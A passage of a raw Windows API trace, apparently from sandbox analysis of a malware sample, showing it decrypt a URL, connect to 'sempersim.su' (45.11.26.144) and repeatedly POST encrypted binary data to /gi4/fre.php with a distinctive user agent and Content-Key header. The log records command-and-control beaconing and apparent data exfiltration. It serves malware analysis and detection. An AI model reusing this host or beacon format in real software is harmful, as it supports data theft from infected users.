dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0273.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc3c) returned 0x3c8 [0273.942] Sleep (dwMilliseconds=0xea60) [0273.953] GetProcessHeap () returned 0x5b0000 [0273.953] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d33e0 [0273.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.954] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0273.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.963] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0273.975] GetProcessHeap () returned 0x5b0000 [0273.975] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0273.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.976] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0273.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.977] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0273.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.978] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.978] GetProcessHeap () returned 0x5b0000 [0273.979] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0273.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.980] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d33e0, pdwDataLen=0xdfcfc | out: pbData=0x5d33e0, pdwDataLen=0xdfcfc) returned 1 [0273.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.981] CryptDestroyKey (hKey=0x5be048) returned 1 [0273.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0273.982] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0273.982] GetProcessHeap () returned 0x5b0000 [0273.982] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0273.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0273.983] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0273.994] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0273.995] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0273.997] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.997] GetProcessHeap () returned 0x5b0000 [0273.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0273.997] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0273.997] GetProcessHeap () returned 0x5b0000 [0273.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0273.998] GetProcessHeap () returned 0x5b0000 [0273.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0273.998] GetProcessHeap () returned 0x5b0000 [0273.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0273.998] GetProcessHeap () returned 0x5b0000 [0273.999] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0274.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.002] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0274.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.010] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0274.021] GetProcessHeap () returned 0x5b0000 [0274.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0274.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.022] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0274.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.023] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0274.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.024] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.024] GetProcessHeap () returned 0x5b0000 [0274.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0274.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.025] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0274.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.026] CryptDestroyKey (hKey=0x5be048) returned 1 [0274.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0274.027] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0274.027] GetProcessHeap () returned 0x5b0000 [0274.028] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0274.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0274.029] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0274.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0274.030] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0274.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0274.031] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0274.031] GetProcessHeap () returned 0x5b0000 [0274.031] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0274.031] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0274.037] GetProcessHeap () returned 0x5b0000 [0274.037] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0274.037] socket (af=2, type=1, protocol=6) returned 0x3cc [0274.038] connect (s=0x3cc, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0274.110] FreeAddrInfoW (pAddrInfo=0x5ce010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0274.110] GetProcessHeap () returned 0x5b0000 [0274.110] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0274.110] GetProcessHeap () returned 0x5b0000 [0274.110] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0274.110] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0274.111] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0274.111] GetProcessHeap () returned 0x5b0000 [0274.111] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0274.111] GetProcessHeap () returned 0x5b0000 [0274.112] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0274.112] GetProcessHeap () returned 0x5b0000 [0274.112] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0274.112] GetProcessHeap () returned 0x5b0000 [0274.112] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0274.113] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0274.114] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0274.114] GetProcessHeap () returned 0x5b0000 [0274.114] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0274.114] GetProcessHeap () returned 0x5b0000 [0274.114] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0274.114] send (s=0x3cc, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0274.116] send (s=0x3cc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0274.116] GetProcessHeap () returned 0x5b0000 [0274.116] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0274.116] recv (in: s=0x3cc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0275.277] GetProcessHeap () returned 0x5b0000 [0275.277] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0275.277] GetProcessHeap () returned 0x5b0000 [0275.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0275.278] GetProcessHeap () returned 0x5b0000 [0275.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0275.278] GetProcessHeap () returned 0x5b0000 [0275.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0275.278] closesocket (s=0x3cc) returned 0 [0275.279] GetProcessHeap () returned 0x5b0000 [0275.279] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0275.279] GetProcessHeap () returned 0x5b0000 [0275.279] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0275.280] GetProcessHeap () returned 0x5b0000 [0275.280] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0275.280] GetProcessHeap () returned 0x5b0000 [0275.280] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0275.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc40) returned 0x3cc [0275.282] Sleep (dwMilliseconds=0xea60) [0275.301] GetProcessHeap () returned 0x5b0000 [0275.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3158 [0275.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.302] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0275.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.309] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0275.321] GetProcessHeap () returned 0x5b0000 [0275.321] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0275.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.322] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0275.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.323] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0275.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.324] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.324] GetProcessHeap () returned 0x5b0000 [0275.325] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0275.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.326] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3158, pdwDataLen=0xdfcfc | out: pbData=0x5d3158, pdwDataLen=0xdfcfc) returned 1 [0275.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.327] CryptDestroyKey (hKey=0x5be048) returned 1 [0275.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.331] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0275.331] GetProcessHeap () returned 0x5b0000 [0275.331] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5910 [0275.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.333] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.334] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.335] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.336] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.336] GetProcessHeap () returned 0x5b0000 [0275.336] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0275.336] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0275.336] GetProcessHeap () returned 0x5b0000 [0275.336] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0275.337] GetProcessHeap () returned 0x5b0000 [0275.337] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5910 | out: hHeap=0x5b0000) returned 1 [0275.337] GetProcessHeap () returned 0x5b0000 [0275.337] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0275.337] GetProcessHeap () returned 0x5b0000 [0275.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d34b8 [0275.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.338] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0275.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.347] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0275.354] GetProcessHeap () returned 0x5b0000 [0275.354] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0275.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.355] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0275.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.356] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0275.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.357] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.357] GetProcessHeap () returned 0x5b0000 [0275.358] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0275.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.360] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d34b8, pdwDataLen=0xdfcfc | out: pbData=0x5d34b8, pdwDataLen=0xdfcfc) returned 1 [0275.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.361] CryptDestroyKey (hKey=0x5be288) returned 1 [0275.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0275.362] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0275.362] GetProcessHeap () returned 0x5b0000 [0275.362] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0275.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.363] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0275.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.364] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0275.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.364] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0275.364] GetProcessHeap () returned 0x5b0000 [0275.365] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0275.365] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdd68*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0275.366] GetProcessHeap () returned 0x5b0000 [0275.366] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa10 [0275.366] socket (af=2, type=1, protocol=6) returned 0x3d0 [0275.366] connect (s=0x3d0, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0275.433] FreeAddrInfoW (pAddrInfo=0x5cdd68*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0275.433] GetProcessHeap () returned 0x5b0000 [0275.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0275.434] GetProcessHeap () returned 0x5b0000 [0275.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0275.435] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0275.436] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0275.436] GetProcessHeap () returned 0x5b0000 [0275.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0275.436] GetProcessHeap () returned 0x5b0000 [0275.437] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0275.437] GetProcessHeap () returned 0x5b0000 [0275.437] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3668 [0275.437] GetProcessHeap () returned 0x5b0000 [0275.437] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0275.438] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0275.439] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0275.439] GetProcessHeap () returned 0x5b0000 [0275.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0275.439] GetProcessHeap () returned 0x5b0000 [0275.439] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0275.439] send (s=0x3d0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0275.440] send (s=0x3d0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0275.440] GetProcessHeap () returned 0x5b0000 [0275.440] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0275.440] recv (in: s=0x3d0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0276.685] GetProcessHeap () returned 0x5b0000 [0276.686] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0276.686] GetProcessHeap () returned 0x5b0000 [0276.686] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0276.686] GetProcessHeap () returned 0x5b0000 [0276.686] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0276.687] GetProcessHeap () returned 0x5b0000 [0276.687] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0276.687] closesocket (s=0x3d0) returned 0 [0276.689] GetProcessHeap () returned 0x5b0000 [0276.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa10 | out: hHeap=0x5b0000) returned 1 [0276.689] GetProcessHeap () returned 0x5b0000 [0276.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0276.689] GetProcessHeap () returned 0x5b0000 [0276.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0276.689] GetProcessHeap () returned 0x5b0000 [0276.690] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0276.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc44) returned 0x3d0 [0276.696] Sleep (dwMilliseconds=0xea60) [0276.702] GetProcessHeap () returned 0x5b0000 [0276.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0276.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.704] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0276.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.724] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, 